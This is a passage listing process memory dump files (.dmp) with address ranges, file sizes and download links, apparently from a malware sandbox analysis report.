memory/4412-201-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/4412-215-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/4412-202-0x0000000002670000-0x0000000002680000-memory.dmp

Filesize
64KB

Download
memory/4412-200-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/4640-295-0x0000000000980000-0x0000000000B36000-memory.dmp

Filesize
1.7MB

Download
memory/4640-302-0x0000000074430000-0x0000000074BE0000-memory.dmp

Filesize
7.7MB

Download
memory/4640-296-0x00000000056F0000-0x000000000578C000-memory.dmp

Filesize
624KB

Download
memory/4640-303-0x00000000059E0000-0x00000000059F0000-memory.dmp

Filesize
64KB

Download
memory/4640-299-0x0000000005830000-0x00000000058C2000-memory.dmp

Filesize
584KB

Download
memory/4640-300-0x00000000059E0000-0x00000000059F0000-memory.dmp

Filesize
64KB

Download
memory/4640-301-0x0000000005810000-0x000000000581A000-memory.dmp

Filesize
40KB

Download
memory/4640-294-0x0000000074430000-0x0000000074BE0000-memory.dmp

Filesize
7.7MB

Download
memory/4640-304-0x00000000059E0000-0x00000000059F0000-memory.dmp

Filesize
64KB

Download
memory/4688-183-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download
memory/4688-181-0x0000000002A10000-0x0000000002A20000-memory.dmp

Filesize
64KB

Download
memory/4688-170-0x0000000002A10000-0x0000000002A20000-memory.dmp

Filesize
64KB

Download
memory/4688-169-0x0000000002A10000-0x0000000002A20000-memory.dmp

Filesize
64KB

Download
memory/4688-168-0x0000000074500000-0x0000000074CB0000-memory.dmp

Filesize
7.7MB

Download